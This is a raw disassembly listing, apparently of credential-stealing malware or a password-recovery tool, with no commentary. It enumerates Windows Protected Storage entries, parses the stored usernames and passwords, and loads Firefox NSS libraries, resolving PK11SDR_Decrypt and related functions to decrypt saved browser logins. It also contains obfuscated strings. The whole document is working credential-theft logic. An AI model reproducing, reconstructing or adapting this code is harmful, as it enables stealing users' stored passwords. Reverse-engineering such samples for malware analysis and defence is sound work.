mov edi, offset aIhfnL6b5x ; "/iHFN/l6B5X/"
mov ebx, offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
mov esi, offset dword_45024C
jnz short loc_423C06
cmp [ebp+18h], eax
jnz short loc_423C10
cmp [ebp+1Ch], eax
jz loc_423D5C
push edi
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CD84
add esp, 14h
loc_423C06: ; CODE XREF: sub_423BB1+34�j
cmp dword ptr [ebp+18h], 0
jz loc_423D5C
loc_423C10: ; CODE XREF: sub_423BB1+39�j
push edi
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CD0E
add esp, 14h
jmp loc_423D5C
; ---------------------------------------------------------------------------
loc_423C26: ; CODE XREF: sub_423BB1+20�j
call sub_427F4E
xor esi, esi
mov [ebp-14h], esi
push esi
push esi
lea eax, [ebp-10h]
push esi
push eax
mov [ebp-4], esi
mov [ebp-10h], esi
call dword_456EEC
cmp eax, esi
jge short loc_423CAA
xor eax, eax
mov ebx, offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
cmp [ebp+14h], eax
mov edi, offset aYdidb16dnmq_ ; "YdidB16dnMQ."
mov esi, offset aSSD_0 ; "%s %s: <%d>"
jnz short loc_423C83
cmp [ebp+18h], eax
jnz short loc_423C8D
cmp [ebp+1Ch], eax
jz loc_423D4B
call dword_43716C ; RtlGetLastWin32Error
push eax
push edi
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CD84
add esp, 18h
loc_423C83: ; CODE XREF: sub_423BB1+AA�j
cmp dword ptr [ebp+18h], 0
jz loc_423D4B
loc_423C8D: ; CODE XREF: sub_423BB1+AF�j
call dword_43716C ; RtlGetLastWin32Error
push eax
push edi
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CD0E
add esp, 18h
jmp loc_423D4B
; ---------------------------------------------------------------------------
loc_423CAA: ; CODE XREF: sub_423BB1+94�j
cmp [ebp-10h], esi
mov byte ptr [ebp-4], 1
mov [ebp-20h], esi
jnz short loc_423CC0
push 80004003h
call sub_429196
loc_423CC0: ; CODE XREF: sub_423BB1+103�j
mov edi, [ebp-10h]
lea ecx, [ebp-20h]
push ecx
push esi
mov eax, [edi]
push esi
push edi
call dword ptr [eax+38h]
cmp eax, esi
jge loc_423D63
push offset dword_45023C
push edi
push eax
call sub_4291A4
cmp dword ptr [ebp+14h], 0
mov ebx, offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
mov edi, offset aYdidb16dnmq_ ; "YdidB16dnMQ."
mov esi, offset aSSD_0 ; "%s %s: <%d>"
jnz short loc_423D1C
cmp dword ptr [ebp+18h], 0
jnz short loc_423D22
cmp dword ptr [ebp+1Ch], 0
jz short loc_423D3A
call dword_43716C ; RtlGetLastWin32Error
push eax
push edi
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CD84
add esp, 18h
loc_423D1C: ; CODE XREF: sub_423BB1+145�j
cmp dword ptr [ebp+18h], 0
jz short loc_423D3A
loc_423D22: ; CODE XREF: sub_423BB1+14B�j
call dword_43716C ; RtlGetLastWin32Error
push eax
push edi
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CD0E
add esp, 18h
loc_423D3A: ; CODE XREF: sub_423BB1+151�j
; sub_423BB1+16F�j
mov eax, [ebp-20h]
and byte ptr [ebp-4], 0
test eax, eax
jz short loc_423D4B
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_423D4B: ; CODE XREF: sub_423BB1+B4�j
; sub_423BB1+D6�j ...
mov eax, [ebp-10h]
or dword ptr [ebp-4], 0FFFFFFFFh
test eax, eax
jz short loc_423D5C
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_423D5C: ; CODE XREF: sub_423BB1+3E�j
; sub_423BB1+59�j ...
xor eax, eax
jmp loc_424515
; ---------------------------------------------------------------------------
loc_423D63: ; CODE XREF: sub_423BB1+120�j
mov ebx, offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
loc_423D68: ; CODE XREF: sub_423BB1+8F0�j
; sub_423BB1+8FC�j
xor edi, edi
cmp [ebp-20h], edi
jnz short loc_423D79
push 80004003h
call sub_429196
loc_423D79: ; CODE XREF: sub_423BB1+1BC�j
mov eax, [ebp-20h]
lea edx, [ebp-40h]
push edi
push edx
mov ecx, [eax]
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jnz loc_4244B2
sub esp, 10h
lea esi, [ebp-40h]
mov edi, esp
lea eax, [ebp-84h]
movsd
movsd
movsd
push offset asc_450238 ; "%x"
push eax
movsd
call dword_437274 ; wsprintfA
add esp, 18h
and dword ptr [ebp-2Ch], 0
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 2
jnz short loc_423DCA
push 80004003h
call sub_429196
loc_423DCA: ; CODE XREF: sub_423BB1+20D�j
mov esi, [ebp-10h]
lea ecx, [ebp-2Ch]
push ecx
lea ecx, [ebp-40h]
mov eax, [esi]
push 0
push ecx
push 0
push esi
call dword ptr [eax+3Ch]
test eax, eax
jge short loc_423DEF
push offset dword_45023C
push esi
push eax
call sub_4291A4
loc_423DEF: ; CODE XREF: sub_423BB1+230�j
mov edi, offset byte_454A34
loc_423DF4: ; CODE XREF: sub_423BB1+8D6�j
; sub_423BB1+8E2�j
xor esi, esi
cmp [ebp-2Ch], esi
jnz short loc_423E05
push 80004003h
call sub_429196
loc_423E05: ; CODE XREF: sub_423BB1+248�j
mov eax, [ebp-2Ch]
lea edx, [ebp-50h]
push esi
push edx
mov ecx, [eax]
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jnz loc_424498
cmp [ebp-10h], esi
mov byte ptr [ebp-4], 3
mov [ebp-28h], esi
jnz short loc_423E33
push 80004003h
call sub_429196
loc_423E33: ; CODE XREF: sub_423BB1+276�j
mov esi, [ebp-10h]
lea ecx, [ebp-28h]
push ecx
lea ecx, [ebp-50h]
mov eax, [esi]
push 0
push ecx
lea ecx, [ebp-40h]
push ecx
push 0
push esi
call dword ptr [eax+54h]
test eax, eax
jge short loc_423E5C
push offset dword_45023C
push esi
push eax
call sub_4291A4
loc_423E5C: ; CODE XREF: sub_423BB1+29D�j
; sub_423BB1+8C8�j
xor esi, esi
cmp [ebp-28h], esi
jnz short loc_423E6D
push 80004003h
call sub_429196
loc_423E6D: ; CODE XREF: sub_423BB1+2B0�j
mov eax, [ebp-28h]
lea edx, [ebp-30h]
push esi
push edx
mov ecx, [eax]
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jnz loc_42447E
push dword ptr [ebp-30h]
lea eax, [ebp-614h]
push offset aWs ; "%ws"
push eax
call dword_437274 ; wsprintfA
add esp, 0Ch
cmp [ebp-10h], esi
mov [ebp-24h], esi
mov [ebp-18h], esi
jnz short loc_423EB2
push 80004003h
call sub_429196
loc_423EB2: ; CODE XREF: sub_423BB1+2F5�j
xor eax, eax
lea edx, [ebp-18h]
push eax
push eax
push edx
mov esi, [ebp-10h]
lea edx, [ebp-24h]
push edx
mov ecx, [esi]
push dword ptr [ebp-30h]
lea edx, [ebp-50h]
push edx
lea edx, [ebp-40h]
push edx
push eax
push esi
call dword ptr [ecx+44h]
test eax, eax
jge short loc_423EE3
push offset dword_45023C
push esi
push eax
call sub_4291A4
loc_423EE3: ; CODE XREF: sub_423BB1+324�j
push dword ptr [ebp-18h]
call dword_437088 ; lstrlenA
mov esi, [ebp-24h]
lea ecx, [esi-1]
cmp eax, ecx
jnb short loc_423F2A
xor ecx, ecx
xor edx, edx
test esi, esi
jbe short loc_423F20
loc_423EFE: ; CODE XREF: sub_423BB1+36D�j
mov eax, [ebp-18h]
mov al, [edx+eax]
test al, al
jnz short loc_423F12
mov byte ptr [ebp+ecx-414h], 2Ch
jmp short loc_423F19
; ---------------------------------------------------------------------------
loc_423F12: ; CODE XREF: sub_423BB1+355�j
mov [ebp+ecx-414h], al
loc_423F19: ; CODE XREF: sub_423BB1+35F�j
inc ecx
inc edx
inc edx
cmp edx, esi
jb short loc_423EFE
loc_423F20: ; CODE XREF: sub_423BB1+34B�j
and byte ptr [ebp+ecx-415h], 0
jmp short loc_423F42
; ---------------------------------------------------------------------------
loc_423F2A: ; CODE XREF: sub_423BB1+343�j
push dword ptr [ebp-18h]
lea eax, [ebp-414h]
push offset aS_5 ; "%s"
push eax
call dword_437274 ; wsprintfA
add esp, 0Ch
loc_423F42: ; CODE XREF: sub_423BB1+377�j
mov esi, dword_4370A4
lea eax, [ebp-0DFCh]
push edi
push eax
call esi ; dword_4370A4
lea eax, [ebp-814h]
push edi
push eax
call esi ; dword_4370A4
lea eax, [ebp-84h]
push offset a5e7e8100 ; "5e7e8100"
push eax
call dword_4370EC ; lstrcmpA
test eax, eax
jnz loc_424031
lea eax, [ebp-1B0h]
push edi
push eax
call esi ; dword_4370A4
lea eax, [ebp-414h]
push offset asc_446DE8 ; ":"
push eax
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_423FCB
lea eax, [ebp-414h]
push offset asc_446DE8 ; ":"
push eax
call sub_42ADD0
pop ecx
inc eax
pop ecx
push eax
lea eax, [ebp-1B0h]
push eax
call esi ; dword_4370A4
lea eax, [ebp-414h]
push offset asc_446DE8 ; ":"
push eax
call sub_42ADD0
and byte ptr [eax], 0
pop ecx
pop ecx
loc_423FCB: ; CODE XREF: sub_423BB1+3E4�j
inc dword ptr [ebp-14h]
lea eax, [ebp-414h]
push edi
push eax
call dword_437174 ; lstrcmpiA
test eax, eax
jz short loc_423FF2
lea eax, [ebp-1B0h]
push edi
push eax
call dword_437174 ; lstrcmpiA
test eax, eax
jnz short loc_423FF8
loc_423FF2: ; CODE XREF: sub_423BB1+42D�j
cmp dword ptr [ebp+1Ch], 0
jz short loc_424031
loc_423FF8: ; CODE XREF: sub_423BB1+43F�j
lea eax, [ebp-1B0h]
cmp dword ptr [ebp+18h], 0
push eax
lea eax, [ebp-414h]
push eax
lea eax, [ebp-614h]
push eax
push ebx
push offset dword_4501FC
push dword ptr [ebp+10h]
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
jnz short loc_424029
call sub_41CE86
jmp short loc_42402E
; ---------------------------------------------------------------------------
loc_424029: ; CODE XREF: sub_423BB1+46F�j
call sub_41CF1A
loc_42402E: ; CODE XREF: sub_423BB1+476�j
add esp, 20h
loc_424031: ; CODE XREF: sub_423BB1+3BF�j
; sub_423BB1+445�j
lea eax, [ebp-84h]
push offset aE161255a ; "e161255a"
push eax
call dword_4370EC ; lstrcmpA
test eax, eax
jnz loc_424194
lea eax, [ebp-614h]
push offset aStringindex ; "StringIndex"
push eax
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz loc_424194
lea eax, [ebp-614h]
push offset dword_4501DC
push eax
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_424093
lea eax, [ebp-614h]
push offset dword_4501DC
push eax
call sub_42ADD0
and byte ptr [eax], 0
pop ecx
pop ecx
loc_424093: ; CODE XREF: sub_423BB1+4CA�j
lea eax, [ebp-614h]
push 8
push eax
lea eax, [ebp-1B0h]
push eax
call dword_437128 ; lstrcpynA
lea eax, [ebp-1B0h]
push offset dword_4501D4
push eax
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_4240DB
lea eax, [ebp-1B0h]
push offset dword_4501CC
push eax
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz loc_424194
loc_4240DB: ; CODE XREF: sub_423BB1+50D�j
lea eax, [ebp-1B0h]
push edi
push eax
call esi ; dword_4370A4
lea eax, [ebp-414h]
push offset dword_44F100
push eax
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_424130
lea eax, [ebp-414h]
push offset dword_44F100
push eax
call sub_42ADD0
pop ecx
inc eax
pop ecx
push eax
lea eax, [ebp-1B0h]
push eax
call esi ; dword_4370A4
lea eax, [ebp-414h]
push offset dword_44F100
push eax
call sub_42ADD0
and byte ptr [eax], 0
pop ecx
pop ecx
loc_424130: ; CODE XREF: sub_423BB1+549�j
mov esi, dword_437174
inc dword ptr [ebp-14h]
lea eax, [ebp-414h]
push edi
push eax
call esi ; dword_437174
test eax, eax
jz short loc_424155
lea eax, [ebp-1B0h]
push edi
push eax
call esi ; dword_437174
test eax, eax
jnz short loc_42415B
loc_424155: ; CODE XREF: sub_423BB1+594�j
cmp dword ptr [ebp+1Ch], 0
jz short loc_424194
loc_42415B: ; CODE XREF: sub_423BB1+5A2�j
lea eax, [ebp-1B0h]
cmp dword ptr [ebp+18h], 0
push eax
lea eax, [ebp-414h]
push eax
lea eax, [ebp-614h]
push eax
push ebx
push offset dword_4501A8
push dword ptr [ebp+10h]
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
jnz short loc_42418C
call sub_41CE86
jmp short loc_424191
; ---------------------------------------------------------------------------
loc_42418C: ; CODE XREF: sub_423BB1+5D2�j
call sub_41CF1A
loc_424191: ; CODE XREF: sub_423BB1+5D9�j
add esp, 20h
loc_424194: ; CODE XREF: sub_423BB1+494�j
; sub_423BB1+4AF�j ...
lea eax, [ebp-84h]
push offset aB9819c52 ; "b9819c52"
push eax
call dword_4370EC ; lstrcmpA
test eax, eax
jnz loc_424333
mov eax, [ebp-18h]
xor esi, esi
xor edi, edi
cmp [ebp-24h], esi
jbe short loc_4241FD
loc_4241BA: ; CODE XREF: sub_423BB1+64A�j
mov cl, [esi+eax]
test cl, cl
jnz short loc_4241CB
mov byte ptr [ebp+edi-414h], 2Ch
jmp short loc_4241F5
; ---------------------------------------------------------------------------
loc_4241CB: ; CODE XREF: sub_423BB1+60E�j
push ecx
call dword_437264 ; IsCharAlphaNumericA
test eax, eax
mov eax, [ebp-18h]
jnz short loc_4241EB
mov cl, [esi+eax]
cmp cl, 40h
jz short loc_4241EB
cmp cl, 2Eh
jz short loc_4241EB
cmp cl, 5Fh
jnz short loc_4241F6
loc_4241EB: ; CODE XREF: sub_423BB1+626�j
; sub_423BB1+62E�j ...
mov cl, [esi+eax]
mov [ebp+edi-414h], cl
loc_4241F5: ; CODE XREF: sub_423BB1+618�j
inc edi
loc_4241F6: ; CODE XREF: sub_423BB1+638�j
inc esi
inc esi
cmp esi, [ebp-24h]
jb short loc_4241BA
loc_4241FD: ; CODE XREF: sub_423BB1+607�j
and byte ptr [ebp+edi-415h], 0
and dword ptr [ebp-1Ch], 0
cmp byte ptr [eax+4], 0
lea esi, [ebp-412h]
jbe loc_424333
mov edi, offset dword_44F100
loc_42421E: ; CODE XREF: sub_423BB1+77C�j
inc esi
lea eax, [ebp-214h]
push esi
push eax
call dword_4370A4 ; lstrcpyA
lea eax, [ebp-214h]
push edi
push eax
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_424252
lea eax, [ebp-214h]
push edi
push eax
call sub_42ADD0
and byte ptr [eax], 0
pop ecx
pop ecx
loc_424252: ; CODE XREF: sub_423BB1+68D�j
push edi
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_424278
push edi
push esi
call sub_42ADD0
pop ecx
inc eax
pop ecx
inc eax
push eax
lea eax, [ebp-0E8h]
push eax
call dword_4370A4 ; lstrcpyA
loc_424278: ; CODE XREF: sub_423BB1+6AC�j
lea eax, [ebp-0E8h]
push edi
push eax
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_42429D
lea eax, [ebp-0E8h]
push edi
push eax
call sub_42ADD0
and byte ptr [eax], 0
pop ecx
pop ecx
loc_42429D: ; CODE XREF: sub_423BB1+6D8�j
push edi
push esi
call sub_42ADD0
pop ecx
mov esi, eax
pop ecx
lea eax, [ebp-0E8h]
push eax
call dword_437088 ; lstrlenA
lea esi, [esi+eax+9]
lea eax, [ebp-0E8h]
push offset byte_454A34
push eax
call dword_437174 ; lstrcmpiA
test eax, eax
jz short loc_4242E5
lea eax, [ebp-214h]
push offset byte_454A34
push eax
call dword_437174 ; lstrcmpiA
test eax, eax
jnz short loc_4242EB
loc_4242E5: ; CODE XREF: sub_423BB1+71C�j
cmp dword ptr [ebp+1Ch], 0
jz short loc_424320
loc_4242EB: ; CODE XREF: sub_423BB1+732�j
lea eax, [ebp-0E8h]
inc dword ptr [ebp-14h]
push eax
lea eax, [ebp-214h]
push eax
push ebx
cmp dword ptr [ebp+18h], 0
push offset dword_450174
push dword ptr [ebp+10h]
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
jnz short loc_424318
call sub_41CE86
jmp short loc_42431D
; ---------------------------------------------------------------------------
loc_424318: ; CODE XREF: sub_423BB1+75E�j
call sub_41CF1A
loc_42431D: ; CODE XREF: sub_423BB1+765�j
add esp, 1Ch
loc_424320: ; CODE XREF: sub_423BB1+738�j
mov eax, [ebp-18h]
inc dword ptr [ebp-1Ch]
movzx eax, byte ptr [eax+4]
cmp [ebp-1Ch], eax
jl loc_42421E
loc_424333: ; CODE XREF: sub_423BB1+5F7�j
; sub_423BB1+662�j
lea eax, [ebp-84h]
push offset a220d5cc1 ; "220d5cc1"
push eax
call dword_4370EC ; lstrcmpA
test eax, eax
jnz loc_42444E
xor esi, esi
mov edi, offset byte_454A34
cmp dword_673668, esi
jle short loc_424399
mov dword ptr [ebp-1Ch], offset byte_66FC34
loc_424363: ; CODE XREF: sub_423BB1+7E6�j
lea eax, [ebp-614h]
push eax
push dword ptr [ebp-1Ch]
call dword_4370EC ; lstrcmpA
test eax, eax
jnz short loc_424389
lea eax, [ebp-414h]
push edi
push eax
call dword_437174 ; lstrcmpiA
test eax, eax
jnz short loc_4243C8
loc_424389: ; CODE XREF: sub_423BB1+7C4�j
add dword ptr [ebp-1Ch], 12Ch
inc esi
cmp esi, dword_673668
jl short loc_424363
loc_424399: ; CODE XREF: sub_423BB1+7A9�j
lea eax, [ebp-414h]
push edi
push eax
call dword_437174 ; lstrcmpiA
test eax, eax
jz short loc_42440C
mov eax, esi
push edi
imul eax, 12Ch
mov edi, offset dword_66FBD0
add eax, edi
push eax
call dword_437174 ; lstrcmpiA
test eax, eax
jnz short loc_424417
jmp short loc_424411
; ---------------------------------------------------------------------------
loc_4243C8: ; CODE XREF: sub_423BB1+7D6�j
imul esi, 12Ch
lea eax, [ebp-414h]
inc dword ptr [ebp-14h]
push eax
lea eax, dword_66FBD0[esi]
push eax
lea eax, dword_66FC98[esi]
push eax
push ebx
cmp dword ptr [ebp+18h], 0
push offset dword_45013C
push dword ptr [ebp+10h]
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
jnz short loc_424405
call sub_41CE86
loc_424400: ; CODE XREF: sub_423BB1+859�j
add esp, 20h
jmp short loc_42444E
; ---------------------------------------------------------------------------
loc_424405: ; CODE XREF: sub_423BB1+848�j
call sub_41CF1A
jmp short loc_424400
; ---------------------------------------------------------------------------
loc_42440C: ; CODE XREF: sub_423BB1+7F8�j
mov edi, offset dword_66FBD0
loc_424411: ; CODE XREF: sub_423BB1+815�j
cmp dword ptr [ebp+1Ch], 0
jz short loc_42444E
loc_424417: ; CODE XREF: sub_423BB1+813�j
imul esi, 12Ch
lea eax, [ebp-414h]
add esi, edi
push eax
inc dword ptr [ebp-14h]
push esi
push ebx
cmp dword ptr [ebp+18h], 0
push offset dword_45010C
push dword ptr [ebp+10h]
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
jnz short loc_424446
call sub_41CE86
jmp short loc_42444B
; ---------------------------------------------------------------------------
loc_424446: ; CODE XREF: sub_423BB1+88C�j
call sub_41CF1A
loc_42444B: ; CODE XREF: sub_423BB1+893�j
add esp, 1Ch
loc_42444E: ; CODE XREF: sub_423BB1+796�j
; sub_423BB1+852�j ...
mov esi, 200h
lea eax, [ebp-614h]
push esi
push 0
push eax
call sub_429690
push esi
lea eax, [ebp-414h]
push 0
push eax
call sub_429690
add esp, 18h
mov edi, offset byte_454A34
jmp loc_423E5C
; ---------------------------------------------------------------------------
loc_42447E: ; CODE XREF: sub_423BB1+2CE�j
mov eax, [ebp-28h]
mov byte ptr [ebp-4], 2
cmp eax, esi
jz loc_423DF4
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
jmp loc_423DF4
; ---------------------------------------------------------------------------
loc_424498: ; CODE XREF: sub_423BB1+266�j
mov eax, [ebp-2Ch]
mov byte ptr [ebp-4], 1
cmp eax, esi
jz loc_423D68
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
jmp loc_423D68
; ---------------------------------------------------------------------------
loc_4244B2: ; CODE XREF: sub_423BB1+1DA�j
cmp [ebp-14h], edi
jnz short loc_4244F0
cmp [ebp+14h], edi
mov esi, offset aSNoPstoreEntri ; "%s No PStore entries found."
jnz short loc_4244DB
cmp [ebp+18h], edi
jnz short loc_4244E0
cmp [ebp+1Ch], edi
jz short loc_4244F0
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CD84
add esp, 10h
loc_4244DB: ; CODE XREF: sub_423BB1+90E�j
cmp [ebp+18h], edi
jz short loc_4244F0
loc_4244E0: ; CODE XREF: sub_423BB1+913�j
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CD0E
add esp, 10h
loc_4244F0: ; CODE XREF: sub_423BB1+904�j
; sub_423BB1+918�j ...
mov eax, [ebp-20h]
and byte ptr [ebp-4], 0
cmp eax, edi
jz short loc_424501
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_424501: ; CODE XREF: sub_423BB1+948�j
mov eax, [ebp-10h]
or dword ptr [ebp-4], 0FFFFFFFFh
cmp eax, edi
jz short loc_424512
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_424512: ; CODE XREF: sub_423BB1+959�j
xor eax, eax
inc eax
loc_424515: ; CODE XREF: sub_423BB1+1AD�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn
sub_423BB1 endp
; =============== S U B R O U T I N E =======================================
sub_424524 proc near ; CODE XREF: sub_424A42+8D�p
arg_0 = dword ptr 4
and dword_673670, 0
and dword_67366C, 0
push offset word_43EF70
push [esp+4+arg_0]
call sub_42A43C
pop ecx
mov dword_6737AC, eax
pop ecx
xor ecx, ecx
test eax, eax
setnz cl
mov eax, ecx
retn
sub_424524 endp
; =============== S U B R O U T I N E =======================================
sub_424551 proc near ; CODE XREF: sub_42459D:loc_4245A8�p
mov eax, dword_673670
cmp eax, dword_67366C
jl short loc_42458B
push dword_6737AC
and dword_673670, 0
push 2800h
push 1
push offset byte_66D3C8
call sub_42A0B8
add esp, 10h
mov dword_67366C, eax
test eax, eax
jg short loc_42458B
xor al, al
retn
; ---------------------------------------------------------------------------
loc_42458B: ; CODE XREF: sub_424551+B�j
; sub_424551+35�j
mov eax, dword_673670
inc dword_673670
mov al, byte_66D3C8[eax]
retn
sub_424551 endp
; =============== S U B R O U T I N E =======================================
sub_42459D proc near ; CODE XREF: sub_424A42+A9�p
; sub_424A42+B6�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
and byte ptr [edi], 0
loc_4245A8: ; CODE XREF: sub_42459D+1F�j
; sub_42459D+25�j ...
call sub_424551
movsx eax, al
test eax, eax
jz short loc_4245E3
cmp eax, 0Ah
jz short loc_4245D9
cmp eax, 0Dh
jz short loc_4245A8
xor ecx, ecx
loc_4245C0: ; CODE XREF: sub_42459D+38�j
test al, al
jz short loc_4245A8
cmp esi, [esp+8+arg_4]
jge short loc_4245E3
mov [esi+edi], al
inc esi
shr eax, 8
inc ecx
cmp ecx, 4
jl short loc_4245C0
jmp short loc_4245A8
; ---------------------------------------------------------------------------
loc_4245D9: ; CODE XREF: sub_42459D+1A�j
and byte ptr [esi+edi], 0
xor eax, eax
inc eax
loc_4245E0: ; CODE XREF: sub_42459D+48�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4245E3: ; CODE XREF: sub_42459D+15�j
; sub_42459D+2B�j
xor eax, eax
jmp short loc_4245E0
sub_42459D endp
; =============== S U B R O U T I N E =======================================
sub_4245E7 proc near ; CODE XREF: sub_424FC9+D9�p
; sub_424FC9+EF�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_43706C ; GetFileAttributesA
movzx eax, al
shr eax, 4
and eax, 1
retn
sub_4245E7 endp
; =============== S U B R O U T I N E =======================================
sub_4245FB proc near ; CODE XREF: sub_424DE2+DF�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_4292D0
xor edx, edx
pop ecx
test eax, eax
jle short loc_424625
loc_42460D: ; CODE XREF: sub_4245FB+28�j
mov cl, [edx+esi]
cmp cl, 41h
jl short loc_424620
cmp cl, 5Ah
jg short loc_424620
add cl, 20h
mov [edx+esi], cl
loc_424620: ; CODE XREF: sub_4245FB+18�j
; sub_4245FB+1D�j
inc edx
cmp edx, eax
jl short loc_42460D
loc_424625: ; CODE XREF: sub_4245FB+10�j
pop esi
retn
sub_4245FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424627 proc near ; CODE XREF: sub_424699+2E�p
; sub_424699+40�p ...
var_1000 = byte ptr -1000h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_429A90
mov al, byte_454A34
push esi
push edi
mov [ebp+var_1000], al
mov ecx, 3FFh
xor eax, eax
lea edi, [ebp+var_FFF]
push [ebp+arg_0]
rep stosd
stosw
stosb
lea eax, [ebp+var_1000]
push eax
call dword_4370A4 ; lstrcpyA
mov esi, dword_437090
lea eax, [ebp+var_1000]
push offset asc_446DD8 ; "/"
push eax
call esi ; dword_437090
push [ebp+arg_4]
lea eax, [ebp+var_1000]
push eax
call esi ; dword_437090
lea eax, [ebp+var_1000]
push eax
call dword_437034 ; LoadLibraryA
pop edi
mov dword_6737A8, eax
pop esi
leave
retn
sub_424627 endp
; =============== S U B R O U T I N E =======================================
sub_424699 proc near ; CODE XREF: sub_424FC9+FE�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
push edi
cmp esi, ebx
mov dword_6737A4, ebx
mov dword_6737A0, ebx
mov edi, offset aPlc4_dll ; "plc4.dll"
mov ebp, offset aNss3_dll ; "nss3.dll"
jz loc_42478B
push offset aMozcrt19_dll ; "mozcrt19.dll"
push esi
call sub_424627
pop ecx
mov ebx, offset aNspr4_dll ; "nspr4.dll"
test eax, eax
pop ecx
jz short loc_424720
push ebx
push esi
call sub_424627
pop ecx
test eax, eax
pop ecx
jz short loc_424720
push offset aPlds4_dll ; "plds4.dll"
push esi
call sub_424627
pop ecx
test eax, eax
pop ecx
jz short loc_424720
push edi
push esi
call sub_424627
pop ecx
test eax, eax
pop ecx
jz short loc_424720
push offset aNssutil3_dll ; "nssutil3.dll"
push esi
call sub_424627
pop ecx
test eax, eax
pop ecx
jz short loc_424720
push offset aSqlite3_dll ; "sqlite3.dll"
push esi
call sub_424627
pop ecx
pop ecx
loc_424720: ; CODE XREF: sub_424699+3C�j
; sub_424699+49�j ...
push ebx
push esi
call sub_424627
pop ecx
test eax, eax
pop ecx
jz short loc_424781
push offset aPlds4_dll ; "plds4.dll"
push esi
call sub_424627
pop ecx
test eax, eax
pop ecx
jz short loc_424781
push edi
push esi
call sub_424627
pop ecx
mov dword_6737A4, eax
test eax, eax
pop ecx
jz short loc_424781
push edi
push esi
call sub_424627
pop ecx
mov dword_6737A4, eax
test eax, eax
pop ecx
jz short loc_424781
push offset aSoftokn3_dll ; "softokn3.dll"
push esi
call sub_424627
pop ecx
test eax, eax
pop ecx
jz short loc_424781
push ebp
push esi
call sub_424627
pop ecx
mov dword_6737A0, eax
pop ecx
loc_424781: ; CODE XREF: sub_424699+92�j
; sub_424699+A3�j ...
xor ebx, ebx
cmp dword_6737A0, ebx
jnz short loc_4247B5
loc_42478B: ; CODE XREF: sub_424699+22�j
mov esi, dword_437034
push ebp
call esi ; dword_437034
push edi
mov dword_6737A0, eax
call esi ; dword_437034
cmp dword_6737A0, ebx
mov dword_6737A4, eax
jz loc_42488D
cmp eax, ebx
jz loc_42488D
loc_4247B5: ; CODE XREF: sub_424699+F0�j
mov esi, dword_437030
push offset aNss_init ; "NSS_Init"
push dword_6737A0
call esi ; dword_437030
push offset aNss_shutdown ; "NSS_Shutdown"
mov dword_67377C, eax
push dword_6737A0
call esi ; dword_437030
push offset aPk11_getintern ; "PK11_GetInternalKeySlot"
mov dword_673780, eax
push dword_6737A0
call esi ; dword_437030
push offset aPk11_freeslot ; "PK11_FreeSlot"
mov dword_673784, eax
push dword_6737A0
call esi ; dword_437030
push offset aPk11_authentic ; "PK11_Authenticate"
mov dword_67378C, eax
push dword_6737A0
call esi ; dword_437030
push offset aPk11sdr_decryp ; "PK11SDR_Decrypt"
mov dword_673790, eax
push dword_6737A0
call esi ; dword_437030
push offset aPk11_checkuser ; "PK11_CheckUserPassword"
mov dword_673794, eax
push dword_6737A0
call esi ; dword_437030
cmp dword_67377C, ebx
mov dword_673788, eax
jz short loc_424888
cmp dword_673780, ebx
jz short loc_424888
cmp dword_673784, ebx
jz short loc_424888
cmp dword_673790, ebx
jz short loc_424888
cmp dword_673794, ebx
jz short loc_424888
cmp dword_67378C, ebx
jz short loc_424888
cmp eax, ebx
jz short loc_424888
push offset aPl_base64decod ; "PL_Base64Decode"
push dword_6737A4
call esi ; dword_437030
cmp eax, ebx
mov dword_673798, eax
jz short loc_424888
xor eax, eax
inc eax
